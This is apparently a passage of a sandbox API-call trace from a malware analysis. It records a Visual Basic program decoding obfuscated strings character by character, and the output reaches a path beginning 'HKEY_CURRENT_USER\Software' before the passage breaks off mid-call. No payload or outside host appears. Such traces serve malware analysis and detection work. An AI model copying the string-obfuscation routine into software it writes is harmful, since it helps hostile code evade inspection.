[0167.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.786] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0167.786] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.787] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0167.787] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.788] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0167.788] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.788] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.789] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.789] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.789] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.790] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0167.790] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.791] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0167.791] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.792] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0167.792] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.793] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0167.793] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.793] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.794] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.794] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0167.795] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.797] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0167.797] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.798] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="K", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0167.798] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.798] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0167.799] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.799] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Y", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="Y") returned 1 [0167.800] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.800] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0167.800] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.801] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0167.801] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="b\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.802] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0167.802] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.803] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0167.803] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.804] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x11683e4, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0167.804] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.804] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0167.805] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.805] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0167.805] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.806] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0167.806] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.807] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0167.807] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="b\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.808] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0167.808] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.808] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0167.809] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.858] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0167.858] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.859] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0167.859] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.860] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.860] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.860] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0167.861] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.861] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.862] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.862] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0167.862] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.863] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0167.863] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.864] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0167.864] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.865] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0167.865] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.865] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.866] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.866] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: 